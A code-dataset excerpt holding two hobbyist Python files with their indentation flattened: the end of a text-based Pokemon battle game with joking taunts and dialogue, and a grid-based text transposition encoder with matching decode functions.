def playerDecision(player, enemy, action_done):
if not player.am_i_alive(enemy):
player.switch_to_not_knocked_out(player, enemy, True, False)
else:
while True:
if player.pokemon[player.active_pokemon].is_knocked_out:
while True:
try:
print(
'Your pokemon has been knocked out and you have to replace it,'
' who is now going to be your active pokemon?\n')
player.print_alive_pokemon()
switch_to = input().strip().lower()
player.switch_active(switch_to, Forced=True)
except TypeError:
print("That wasn't one of the options")
action = input(
"What do you wanna do now?\nOptions:\n-Attack\n-Heal\n-Switch\n-Print Stats"
"\n-Regret Life Decisions\n").lower().strip()
if action == 'attack':
player.attack_trainer(enemy)
break
elif action == 'heal':
if player.potions >= 1:
while True:
try:
potions_used = int(input("How many potions would you like to use?\n"))
if potions_used > player.potions:
print(f"You can't use that many potions because you only have "
f"{player.potions} potions(s)")
else:
player.heal(int(potions_used))
break
except TypeError:
print("that is an invalid number of potions\nTry again")
except ValueError:
print("that is an invalid number of potions\nTry again")
break
else:
print("You can't heal your pokemon because you have no potions left")
elif action == "switch":
# if player.turn < 2:
# print("You can only switch pokemon once every 3 turns, you'll
# have to try again later \nyou have "+3-self.turn+" turn(s) left until you can switch")
# else:
while True:
try:
print('Which pokemon do you want to switch to? Options:')
player.print_alive_pokemon()
print("-cancel")
switch_to = input().strip().lower()
if switch_to == "cancel":
break
else:
player.switch_active(switch_to, Forced=False)
break
except TypeError:
print("That wasn't one of the options try again")
break
elif action == "print stats":
stats_choice = input(
"whose stats do you want to print?\n-my stats\n-my pokemon's stats"
"\n-enemy's stats\n-enemy's pokemon stats-\nall my stats"
"\n-all my enemy's stats\n-all stats\n").lower().strip()
if stats_choice == 'my stats':
player.print_stats()
elif stats_choice == "my pokemon's stats":
player.print_pokemon_stats()
elif stats_choice == "enemy's stats":
enemy.print_stats()
elif stats_choice == "enemy's pokemon stats":
enemy.print_pokemon_stats()
elif stats_choice == "all my stats":
player.print_stats()
player.print_pokemon_stats()
elif stats_choice == "all my enemy's stats":
enemy.print_stats()
enemy.print_pokemon_stats()
elif stats_choice == "all stats":
player.print_stats()
player.print_pokemon_stats()
enemy.print_stats()
enemy.print_pokemon_stats()
else:
print('That is not a valid choice')
elif action == 'regret life decisions':
print('Regretting life decisions...')
else:
print('That is not a valid response, try again')
def real_fight(player1, enemy):
while enemy.am_i_alive(player1) and player1.am_i_alive(enemy):
print('''Your turn:\n___________________________''')
if enemy.am_i_alive(player1) and player1.am_i_alive(enemy):
playerDecision(player1, enemy, False)
input("\n")
print('''Enemy's turn:\n___________________________''')
enemyDesicionTree(enemy, player1)
def reset(player1, enemy):
print("RESET")
players = [player1, enemy]
for player in players:
player.alive = True
player.potions = 5
player.pokemon = player.OG_pokemon
player.pokemonDict = player.OG_pokemonDict
for pokemon in player.pokemon:
pokemon.health = pokemon.OG_health
pokemon.ex = False
pokemon.name = pokemon.OG_name
pokemon.is_knocked_out = False
pokemon.level = 0
pokemon.exp = 0
pokemon.ex = False
player.alive_pokemon.append(pokemon)
def advance_reset(player1, enemy):
players = [player1, enemy]
print("ADVANCE RESET")
for player in players:
player.alive = True
player.potions = 5
for pokemon in player.pokemon:
pokemon.health = pokemon.OG_health
pokemon.ex = False
pokemon.name = pokemon.OG_name
pokemon.is_knocked_out = False
pokemon.level = 0
pokemon.exp = 0
pokemon.ex = False
player.alive_pokemon.append(pokemon)
if pokemon.type == 'fire':
firePokemonList.append(pokemon)
elif pokemon.type == 'water':
waterPokemonList.append(pokemon)
elif pokemon.type == 'grass':
grassPokemonList.append(pokemon)
player.pokemonDict = None
player.pokemon = None
default_pokemon = createNew(7)
for pokemon in default_pokemon:
print(pokemon.name)
default = Trainer('Ash', 5, default_pokemon, 0)
default.print_stats()
print("__________________________")
enemy = Trainer('Blue', 5, createEnemy(default), random.randint(0, len(default.pokemon) - 1))
print('''Enemy's pokemon are ''')
enemy.print_stats()
def insult_gen():
insults = [
"I'VE SEEN ACTUAL POTATOES HAVE BETTER AIM!",
"I COULDN'T HAVE DONE WORSE IF I WAS TRYING TO SABATOGE OUR GAME!",
"I'LL Kill YOU!", "LOOKS LIKE SOMEONE WANTS TO DIE!", "REEEEEEEEEEEE!",
"\n(grabs bat)\nStranger: HEY HEY, lets focus on fighting the OTHER guy ok?",
"AARRGGGG!", "NEXT TIME MAKE SURE YOUR OPPONENT DOESN'T LIVE TO SEE THE NEXT DAY!",
"YOU'RE USELESS TO ME!", "AFTER THIS, ITS OFF TO THE GULAGS WITH YOU!",
"THATS IT! YOU ARE NOW AN ENEMY TO THE STATE!", "IF YOU'RE NOT WITH ME THEN YOU'RE AGAINST ME!",
"I FEEL LIKE YOUR PARENTS BECAUSE I'M SO DISSAPOINTED RIGHT NOW!",
"YOU'RE LIKE SWAIN, YOU'RE A FAILURE!", "TIME TO DIE!", "WHY DO YOU SUCK SO MUCH?",
"THERE IS NO WORD THAT CAN POSSIBLE DESCRIBE HOW BAD YOU ARE!"
]
return choice(insults)
def encouragement_gen(self: Trainer, other_player: Trainer) -> str:
encouragement = [
f"Nice job {self.pokemon[self.active_pokemon]}\n hey {other_player.name}! next he's going to do that to you!",
f"Way to go {self.pokemon[self.active_pokemon]}!", "god it HURTS to be this good",
"AYYYYYYYYYYY", f"Aw god {other_player.name} it must suck to suck huh?",
f"Hey {other_player.name} ! when my {self.pokemon[self.active_pokemon].name}"
f" hit your pokemon I was imagining that its face was yours!",
"HAHAHAHAHAHAHAHAHHA FEEL THE PAIN!!!", f"GOD I CANNOT IMAGINE BEING AS BAD AS YOU {other_player.name}!" +
"YES BEAT THAT M!&#*$#&@!", f"SUCK IT {other_player.name.upper()}!",
f"Hey {other_player.name} I bet you wish you were as good as me huh?\n keyword being \"wish\"",
"LETS GOOOOOO!", "Bro when you run out of pokemon I'm going to feel SOOO good beating you up",
f"Hey {other_player.name} I bet last time you got beat this bad it was with a belt right?",
f"NICE, I only need to kill a few more pokemon until I can beat the crap out of {other_player.name}",
f"Hey {other_player.name}! I bet you regret messing with me now right?\n No? Well you're about to!",
"Yknow, I once had a nightmare where I was an absolute loser so I guess I know what it felt to be like you ",
f"Yknow they say that a pokemon represents their trainer I guess that's why your "
f"{other_player.pokemon[other_player.active_pokemon].name} took that punch like a little b&#@$",
f"Yknow {other_player.name}? You should actually feel privileged to fight someone as great as me",
'GOD, I almost feel bad for you!\nKeyword "almost"',
f"Hey things are looking bad for you {other_player.name}! \nI guess I should ask now,"
f" do you wanna be punted to death or kicked to death?\nOh well I guess I'll do both",
f"*sigh* Yknow, it sucks that I'll only get to ABSOLUTELY destroy you once {other_player.name}"
f"\nActually yknow what?\nDoing it again would be REALLY easy",
"Yknow <NAME> said that two things were infinite, the amount of times that I WIN and your stupidity",
"UGH, this is actually boring now, its like beating up a toddler,"
" but I guess as long as that toddler is you, it's fine",
"When I'm done with you, homeless people will donate to you",
f"I guess the rumors are true {other_player.name}, you suck at everything"
]
return choice(encouragement)
# _________________________________________________________________________________________________________
fight_choice = input("what kinda fight?\n")
if fight_choice == 'real':
pal = 'Stranger: '
enemy_dialog = "Blue: "
print(
pal + '''Ayo that kid over there is talking smack about you \nyou gotta defend your honor! \nYou should definately fight him. \nWhat? you don't have any pokemon? \nWhat are you POOR? Fine, I'll let you borrow mine for 500 dollars per minute. \nYeah it's a great deal I know''' + '\n Anyways what pokemon do you want? You only get to choose 3 so make good decisions\nTo start off you must first')
personal_list = []
personal_list = choose_pokemon(personal_list, 0)
personal_list = decide(False, personal_list, first_dialog=True)
print(
pal + "*sigh* well I guess these pokemon aren't THAT bad anyways you should buy some potions, \npotions heal your pokemon so their suffering continues \nAnyways lets see how many potions we can buy with your money")
input('(press any key to reach into your pocket to check for money)\n')
print(
"(you find that your pocket is empty)\n" + pal + "Oh yeah I forgot, back when I was pickpocketing you for money I found 5 bucks, but don't worry I already bought you some potions\n*hands you 5 potions*")
name = input("Oh yeah it's kinda weird to ask this after everything, but what's your name?\n")
player1 = Trainer(name, 5, personal_list, 0)
input(
pal + name.upper() + "??? Thats the stupidest name I've ever heard in my life\n seriously though whats your name\n(press enter to continue)\n")
print(
pal + "oh... I see so that IS your real name... well. I should let you know that " + name + " means something unspeakable in several languages here\nAnyways what pokemon are you going to have active?\nHere a list of your pokemon in case you forgot")
print(player1.print_alive_pokemon())
while True:
active = input().lower()
try:
player1.switch_active(active, first=True)
break
except TypeError:
print(pal + 'Bruh what? you dont have that pokemon, try again')
print(
pal + "ugh, why'd you have to change to your worst pokemon\nYknow as punishment that decisions is going to be one that you can't change until your actually in battle, serves you right\n")
input(
pal + "Anyways all you need to do now is fight him, cmon you gotta face your fears and go there!\nPress enter to approach\n")
input(
enemy_dialog + "Oh? Your approaching me? Instead of running away you're coming right towards me?\n(Press enter to respond)\n")
input(
name + ": I can't beat the crap out of you without getting getting closer\n" + enemy_dialog + " Oh? Then come as close as you like\n(Both of you begin to approach each other)\n")
print("\nTime to fight" + '\nYour stats are: ')
player1.print_stats()
input("\n")
enemy = Trainer('Blue', 5, createEnemy(player1), random.randint(0, 4))
print('''Enemy's pokemon are: ''')
enemy.print_stats()
real_fight(player1, enemy)
elif fight_choice == "skip":
pokemon_amount = int(input("how many pokemon do you want?"))
default_pokemon = createNew(pokemon_amount)
default = Trainer('Ash', 5, default_pokemon, 0)
default.print_stats()
input("\n")
print("__________________________")
enemy = Trainer('Blue', 5, createEnemy(default), random.randint(0, len(default.pokemon) - 1))
print('''Enemy's pokemon are ''')
enemy.print_stats()
real_fight(default, enemy)
elif fight_choice == "test":
personal_list = []
personal_list = choose_pokemon(personal_list, 0)
personal_list = decide(False, personal_list, first_dialog=True)
default = Trainer('Ash', 5, personal_list, 0)
default.print_stats()
input("\n")
print("__________________________")
enemy = Trainer('Blue', 5, createEnemy(default), 0)
print('''Enemy's pokemon are: ''')
enemy.print_stats()
real_fight(default, enemy)
else:
default_pokemon = createNew(7)
default = Trainer('Ash', 5, default_pokemon, 0)
default.print_stats()
print("__________________________")
enemy = Trainer('Blue', 5, createEnemy(default), random.randint(0, len(default.pokemon) - 1))
print('''Enemy's pokemon are ''')
enemy.print_stats()
for x in range(1):
while enemy.am_i_alive(default) and default.am_i_alive(enemy) and enemy.alive and default.alive:
print('''Your turn:\n___________________________''')
# default.print_stats()
# playerDecision(player1,enemy,True)
# default.print_stats()
enemyDesicionTree(default, enemy)
# enemy.print_stats()
if enemy.am_i_alive(default) and default.am_i_alive(enemy) and enemy.alive and default.alive:
print('''Enemy's turn:\n___________________________''')
enemyDesicionTree(enemy, default)
# reset(default,enemy)
# #advance_reset(default,enemy)
# print(str(x))
# default.print_stats()
# default.print_pokemon_stats()
# enemy.print_stats()
# enemy.print_pokemon_stats()
``` |
{
"source": "Ji19283756/random_writing_encoder",
"score": 4
} |
#### File: Ji19283756/random_writing_encoder/insane_encoder.py
```python
from random import randint, shuffle
# OFICIAL_________________________
def flip_vertically(double_array):
return [line[::-1] for line in double_array]
def flip_horizontally(double_array):
return double_array[::-1]
def make_consistant(double_array, width, spaces):
return [line + " " * (width * (spaces + 1) - len(line)) + "\n"
for line in double_array if len(line) > 0]
def remove_spaces_and_make_double_array(message, spaces):
message = message.split("\n")
message_array = [[mini_array[x] for x in range(0, len(mini_array), spaces + 1)]
for mini_array in message if len(mini_array) != 0]
return message_array
# ______________VERTICAL____________________
def TL_top_down_vertical(message, width=10, height=12, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
and isinstance(width, int) and isinstance(width, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_string_array = ["" for x in range(height)]
for x, letter in zip(range(width * height), message):
empty_string_array[x % height] += letter + " " * spaces
consistant_array = make_consistant(empty_string_array, width, spaces)
printed_string = "".join(consistant_array)
return printed_string
def TL_top_down_vertical_revert(message, spaces=2):
if not isinstance(message, str) or not isinstance(spaces, int) \
or len(message) <= 0 or spaces < 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
arranged_array = [
message_array[x][y]
for y in range(len(message_array[0]))
for x in range(len(message_array))
]
printed_string = "".join(arranged_array) # .strip()
return printed_string
def TR_top_down_vertical(message, width=10, height=12, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
and isinstance(width, int) and isinstance(width, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_string_array = ["" for x in range(height)]
for x, letter in zip(range(width * height), message):
empty_string_array[x % height] += " " * spaces + letter
consistant_array = make_consistant(empty_string_array, width, spaces)
printed_string = "".join(flip_vertically(consistant_array))
return printed_string
def TR_top_down_vertical_revert(message, spaces=2):
if not isinstance(message, str) or not isinstance(spaces, int) \
or len(message) <= 0 or spaces < 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
arranged_array = [
message_array[y][x]
for x in range(len(message_array[0]) - 1, -1, -1)
for y in range(len(message_array))
]
printed_string = "".join(arranged_array) # .strip()
return printed_string
def BL_top_up_vertical(message, width=10, height=12, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
and isinstance(width, int) and isinstance(width, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_string_array = TL_top_down_vertical(message, width=width, spaces=spaces, height=height)
empty_string_array = empty_string_array.split("\n")[::-1]
printed_string = "".join(line + "\n" for line in empty_string_array)
return printed_string
def BL_top_up_vertical_revert(message, spaces=2):
if not isinstance(message, str) or not isinstance(spaces, int) \
or len(message) <= 0 or spaces < 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_horizontally(message_array)
arranged_array = [
message_array[x][y]
for y in range(len(message_array[0]))
for x in range(len(message_array))
]
printed_string = "".join(arranged_array) # .strip()
return printed_string
def BR_top_up_vertical(message, width=10, height=12, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
and isinstance(width, int) and isinstance(width, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_string_array = TR_top_down_vertical(message, width=width, spaces=spaces, height=height)
empty_string_array = empty_string_array.split("\n")[::-1]
printed_string = "".join(line + "\n" for line in empty_string_array[:-1])
return printed_string
def BR_top_up_vertical_revert(message, spaces=2):
if not isinstance(message, str) or not isinstance(spaces, int) \
or len(message) <= 0 or spaces < 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces=spaces)
message_array = flip_horizontally(message_array)
arranged_array = [
message_array[y][x]
for x in range(len(message_array[0]) - 1, -1, -1)
for y in range(len(message_array))
]
printed_string = "".join(arranged_array) # .strip()
return printed_string
# ______________LEFT_RIGHT____________________
def TL_left_right_horizontal_v2(message, width=10, height=12, spaces=2):
arranged_array = [message[start:start + width]
for start, x in zip(range(0, len(message), width), range(height))]
added_spaces = ["".join(letter + " " * spaces for letter in mini_array)
for mini_array in arranged_array]
consistant_array = make_consistant(added_spaces, width, spaces)
printed_string = "".join(consistant_array)
return printed_string
def TL_left_right_horizontal_revert(message, spaces=2):
message_array = remove_spaces_and_make_double_array(message, spaces)
# try:
printed_string = "".join("".join(line) for line in message_array) # .strip()
# except:
# print(f"message: {message_array}")
return printed_string
def BL_left_right_horizontal(message, width=10, height=12, spaces=2):
arranged_array = [message[start:start + width]
for start, x in zip(range(0, len(message), width), range(height))]
added_spaces = ["".join(letter + " " * spaces for letter in mini_array)
for mini_array in arranged_array]
added_spaces = flip_horizontally(added_spaces)
consistant_array = make_consistant(added_spaces, width, spaces)
printed_string = "".join(consistant_array)
return printed_string
def BL_left_right_horizontal_revert(message, spaces=2):
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_horizontally(message_array)
printed_string = "".join("".join(line) for line in message_array) # .strip()
return printed_string
def TR_right_left_horizontal(message, width=10, height=12, spaces=2):
arranged_array = [message[start:start + width]
for start, x in zip(range(0, len(message), width), range(height))]
added_spaces = ["".join(" " * spaces + letter for letter in mini_array)
for mini_array in arranged_array]
consistant_array = make_consistant(added_spaces, width, spaces)
consistant_array = flip_vertically(consistant_array)
printed_string = "".join(consistant_array)
return printed_string
def TR_right_left_horizontal_revert(message, spaces=2):
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_vertically(message_array)
printed_string = "".join("".join(line) for line in message_array) # .strip()
return printed_string
def BR_right_left_horizontal(message, width=10, height=12, spaces=2):
arranged_array = [message[start:start + width]
for start, x in zip(range(0, len(message), width), range(height))]
added_spaces = ["".join(" " * spaces + letter for letter in mini_array)
for mini_array in arranged_array]
consistant_array = make_consistant(added_spaces, width, spaces)
fliped_array = flip_vertically(consistant_array)
printed_string = "".join(fliped_array)
return printed_string
def BR_right_left_horizontal_revert(message, spaces=2):
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_vertically(message_array)
printed_string = "".join("".join(line) for line in message_array) # .strip()
return printed_string
# ______________NORTH_EAST____________________
def TL_north_east_diagonal(message, width=12, height=19, spaces=2):
empty_string = ["" for x in range(height + 1)]
message_increment = 0
repeat = height + width
not_bigger_than_height = 0
for x in range(repeat):
if (x - width) > 0:
bottom = x - width
else:
bottom = 0
for y in range(x - not_bigger_than_height, bottom, -1):
# print(f"inc {message_increment}")
coord = y % (height + 1)
if message_increment > len(message) or message_increment > len(message) - 1:
break
elif coord > bottom:
empty_string[coord] += message[message_increment] + spaces * " "
message_increment += 1
not_bigger_than_height += x > height
# for thing in empty_string:
# print(thing)
consistant_array = make_consistant(empty_string, width, spaces)
printed_string = "".join(consistant_array)
return printed_string
def TL_north_east_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
final_message = []
message_array = remove_spaces_and_make_double_array(message, spaces)
# for line in message_array:
# print(line)
for x in range(len(message), 0, -1):
thing = x
while True:
try:
final_message += [message_array[thing][-1]]
message_array[thing].pop(-1)
thing += 1
except IndexError:
break
# for line in message_array:
# print(line)
mini_array, increment = 0, 0
while len(message_array[0]) > 0:
if len(message_array[mini_array]) > 0:
final_message += [message_array[mini_array][-1]]
message_array[mini_array].pop(-1)
mini_array += 1
mini_array %= (len(message_array))
else:
mini_array = 0
final_message = "".join(final_message[::-1]) # .strip()
return final_message
def TR_north_west_diagonal(message, width=12, height=19, spaces=2):
empty_string = ["" for x in range(height + 1)]
message_increment = 0
repeat = height + width
not_bigger_than_height = 0
for x in range(repeat):
if (x - width) > 0:
bottom = x - width
else:
bottom = 0
for y in range(x - not_bigger_than_height, bottom, -1):
# print(f"inc {message_increment}")
coord = y % (height + 1)
if message_increment > len(message) or message_increment > len(message) - 1:
break
elif coord > bottom:
empty_string[coord] += spaces * " " + message[message_increment]
message_increment += 1
not_bigger_than_height += x > height
# for thing in empty_string:
# print(thing)
consistant_array = make_consistant(empty_string, width, spaces)
consistant_array = flip_vertically(consistant_array)
printed_string = "".join(consistant_array)
return printed_string
def TR_north_west_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
final_message = []
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_vertically(message_array)
# for line in message_array:
# print(line)
for x in range(len(message), 0, -1):
thing = x
while True:
try:
final_message += [message_array[thing][-1]]
message_array[thing].pop(-1)
thing += 1
except IndexError:
break
# for line in message_array:
# print(line)
mini_array, increment = 0, 0
while len(message_array[0]) > 0:
if len(message_array[mini_array]) > 0:
final_message += [message_array[mini_array][-1]]
message_array[mini_array].pop(-1)
mini_array += 1
mini_array %= (len(message_array))
else:
mini_array = 0
final_message = "".join(final_message[::-1]) # .strip()
return final_message
def BL_south_east_diagonal(message, width=12, height=19, spaces=2):
empty_string = ["" for x in range(height + 1)]
message_increment = 0
repeat = height + width
not_bigger_than_height = 0
for x in range(repeat):
if (x - width) > 0:
bottom = x - width
else:
bottom = 0
for y in range(x - not_bigger_than_height, bottom, -1):
coord = y % (height + 1)
if message_increment > len(message) or message_increment > len(message) - 1:
break
elif coord > bottom:
empty_string[coord] += message[message_increment] + spaces * " "
message_increment += 1
not_bigger_than_height += x > height
consistant_array = make_consistant(empty_string, width, spaces)
flipped_array = flip_horizontally(consistant_array)
printed_string = "".join(flipped_array)
return printed_string
def BL_south_east_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
final_message = []
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_horizontally(message_array)
for x in range(len(message), 0, -1):
thing = x
while True:
try:
final_message += [message_array[thing][-1]]
message_array[thing].pop(-1)
thing += 1
except IndexError:
break
mini_array, increment = 0, 0
while len(message_array[0]) > 0:
if len(message_array[mini_array]) > 0:
final_message += [message_array[mini_array][-1]]
message_array[mini_array].pop(-1)
mini_array += 1
mini_array %= (len(message_array))
else:
mini_array = 0
final_message = "".join(final_message[::-1]) # .strip()
return final_message
def BR_south_west_diagonal(message, width=12, height=19, spaces=2):
empty_string = ["" for x in range(height + 1)]
message_increment = 0
repeat = height + width
not_bigger_than_height = 0
for x in range(repeat):
if (x - width) > 0:
bottom = x - width
else:
bottom = 0
for y in range(x - not_bigger_than_height, bottom, -1):
coord = y % (height + 1)
if message_increment > len(message) or message_increment > len(message) - 1:
break
elif coord > bottom:
empty_string[coord] += spaces * " " + message[message_increment]
message_increment += 1
not_bigger_than_height += x > height
consistant_array = make_consistant(empty_string, width, spaces)
consistant_array = flip_vertically(consistant_array)
flipped_array = flip_horizontally(consistant_array)
printed_string = "".join(flipped_array)
return printed_string
def BR_south_west_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
final_message = []
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_horizontally(message_array)
message_array = flip_vertically(message_array)
for x in range(len(message), 0, -1):
thing = x
while True:
try:
final_message += [message_array[thing][-1]]
message_array[thing].pop(-1)
thing += 1
except IndexError:
break
mini_array, increment = 0, 0
while len(message_array[0]) > 0:
if len(message_array[mini_array]) > 0:
final_message += [message_array[mini_array][-1]]
message_array[mini_array].pop(-1)
mini_array += 1
mini_array %= (len(message_array))
else:
mini_array = 0
final_message = "".join(final_message[::-1]) # .strip()
return final_message
# ______________SOUTH_WEST____________________
def TL_south_west_diagonal(message, width=12, height=19, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
and isinstance(width, int) and isinstance(width, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_array = ["" for x in range(height)]
message_increment, begin = 0, 0
if height * width > len(message):
repeat = len(message)
else:
repeat = height + width
for x in range(repeat):
if x > width:
begin += 1
for y in range(begin, x):
if y == height or message_increment > len(message) - 1:
break
else:
empty_array[y] += message[message_increment] + " " * spaces
message_increment += 1
consistant_array = make_consistant(empty_array, width, spaces)
printed_array = "".join(consistant_array)
return printed_array
def TL_south_west_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
final_message = []
height = len(message_array)
width = len(message_array[0])
for x in range(width - 1):
increment = height - 1
while True:
next_array = message_array[increment - 1]
current_array = message_array[increment]
final_message += current_array[-1]
current_array.pop(-1)
if len(next_array) == len(current_array) + 1 or increment == 0:
break
else:
increment -= 1
for x in range(len(message_array) - 1, -1, -1):
for y in range(x, x - width, -1):
try:
final_message += message_array[y][-1]
message_array[y].pop(-1)
except:
break
printed_string = "".join(final_message[::-1]) # .strip()
return printed_string
def TR_south_east_diagonal(message, width=12, height=19, spaces=2):
def len_filler(line):
return (width * (spaces + 1) - len(line))
if not (isinstance(message, str) and isinstance(width, int) \
and isinstance(width, int) and isinstance(width, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_array = ["" for x in range(height)]
message_increment, begin = 0, 0
if height * width > len(message):
repeat = len(message)
else:
repeat = height + width
for x in range(repeat):
if x > width:
begin += 1
for y in range(begin, x):
if y == height or message_increment > len(message) - 1:
break
else:
empty_array[y] += " " * spaces + message[message_increment]
message_increment += 1
consistant_array = make_consistant(empty_array, width, spaces)
consistant_array = flip_vertically(consistant_array)
printed_array = "".join(consistant_array)
return printed_array
def TR_south_east_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_vertically(message_array)
final_message = []
height = len(message_array)
width = len(message_array[0])
for x in range(width - 1):
increment = height - 1
while True:
next_array = message_array[increment - 1]
current_array = message_array[increment]
final_message += current_array[-1]
current_array.pop(-1)
if len(next_array) == len(current_array) + 1 or increment == 0:
break
else:
increment -= 1
for x in range(len(message_array) - 1, -1, -1):
for y in range(x, x - width, -1):
try:
final_message += message_array[y][-1]
message_array[y].pop(-1)
except:
break
printed_string = "".join(final_message[::-1]) # .strip()
return printed_string
def BL_south_west_diagonal(message, width=12, height=19, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
and isinstance(width, int) and isinstance(width, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_array = ["" for x in range(height)]
message_increment, begin = 0, 0
if height * width > len(message):
repeat = len(message)
else:
repeat = height + width
for x in range(repeat):
if x > width:
begin += 1
for y in range(begin, x):
if y == height or message_increment > len(message) - 1:
break
else:
empty_array[y] += message[message_increment] + " " * spaces
message_increment += 1
consistant_array = make_consistant(empty_array, width, spaces)
flipped_array = flip_horizontally(consistant_array)
printed_array = "".join(flipped_array)
return printed_array
def BL_south_west_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_horizontally(message_array)
final_message = []
height = len(message_array)
width = len(message_array[0])
for x in range(width - 1):
increment = height - 1
while True:
next_array = message_array[increment - 1]
current_array = message_array[increment]
final_message += current_array[-1]
current_array.pop(-1)
if len(next_array) == len(current_array) + 1 or increment == 0:
break
else:
increment -= 1
for x in range(len(message_array) - 1, -1, -1):
for y in range(x, x - width, -1):
try:
final_message += message_array[y][-1]
message_array[y].pop(-1)
except:
break
printed_string = "".join(final_message[::-1]) # .strip()
return printed_string
def BR_south_east_diagonal(message, width=12, height=19, spaces=2):
if not (isinstance(message, str) and isinstance(width, int) \
and isinstance(width, int) and isinstance(width, int)) \
or width < 0 or height < 0 or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
empty_array = ["" for x in range(height)]
message_increment, begin = 0, 0
if height * width > len(message):
repeat = len(message)
else:
repeat = height + width
for x in range(repeat):
if x > width:
begin += 1
for y in range(begin, x):
if y == height or message_increment > len(message) - 1:
break
else:
empty_array[y] += " " * spaces + message[message_increment]
message_increment += 1
consistant_array = make_consistant(empty_array, width, spaces)
consistant_array = flip_vertically(consistant_array)
flipped_array = flip_horizontally(consistant_array)
printed_array = "".join(flipped_array)
return printed_array
def BR_south_east_diagonal_revert(message, spaces=2):
if not (isinstance(message, str) and isinstance(spaces, int)) \
or spaces < 0 or len(message) <= 0:
print("something went wrong")
return ""
message_array = remove_spaces_and_make_double_array(message, spaces)
message_array = flip_vertically(message_array)
message_array = flip_horizontally(message_array)
final_message = []
height = len(message_array)
width = len(message_array[0])
for x in range(width - 1):
increment = height - 1
while True:
next_array = message_array[increment - 1]
current_array = message_array[increment]
final_message += current_array[-1]
current_array.pop(-1)
if len(next_array) == len(current_array) + 1 or increment == 0:
break
else:
increment -= 1
for x in range(len(message_array) - 1, -1, -1):
for y in range(x, x - width, -1):
try:
final_message += message_array[y][-1]
message_array[y].pop(-1)
except:
break
printed_string = "".join(final_message[::-1]) # .strip()
return printed_string
# _____________________________________________________
def make_random_string(length):
all_char = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV' \
'WXYZ 1234567890"\'^[]<>{}\\/|;:.,~!?@#$%=&*()°€¥£-_+')
shuffle(all_char)
return all_char[:length]
def the_most_insane_encoder(message, **kwargs):
switches = kwargs.get("switches", 10)
dict_chars = kwargs.get("encoding_dict", None)
order_of_encoding = kwargs.get("order_of_encoding", None)
mode = kwargs.get("mode", " ")
height = kwargs.get("height", 10)
width = kwargs.get("width", 10)
encoders = [BL_left_right_horizontal,
BL_south_east_diagonal,
BL_south_west_diagonal,
BL_top_up_vertical,
BR_right_left_horizontal,
BR_south_east_diagonal,
BR_south_west_diagonal,
BR_top_up_vertical,
TL_left_right_horizontal_v2,
TL_north_east_diagonal,
TL_south_west_diagonal,
TL_top_down_vertical,
TR_right_left_horizontal,
TR_north_west_diagonal,
TR_south_east_diagonal,
TR_top_down_vertical]
decoders = [BL_left_right_horizontal_revert,
BL_south_east_diagonal_revert,
BL_south_west_diagonal_revert,
BL_top_up_vertical_revert,
BR_right_left_horizontal_revert,
BR_south_east_diagonal_revert,
BR_south_west_diagonal_revert,
BR_top_up_vertical_revert,
TL_left_right_horizontal_revert,
TL_north_east_diagonal_revert,
TL_south_west_diagonal_revert,
TL_top_down_vertical_revert,
TR_right_left_horizontal_revert,
TR_north_west_diagonal_revert,
TR_south_east_diagonal_revert,
TR_top_down_vertical_revert]
if dict_chars is None:
dict_chars = make_random_string(32)
first_sixteen = dict_chars[:16]
last_sixteen = dict_chars[16:]
elif len(dict_chars) != 32:
print("You need exactly 32 characters to make your own dictionary!")
return
else:
first_sixteen = dict_chars[:16]
last_sixteen = dict_chars[16:]
encoding_dict = dict(zip(first_sixteen, encoders))
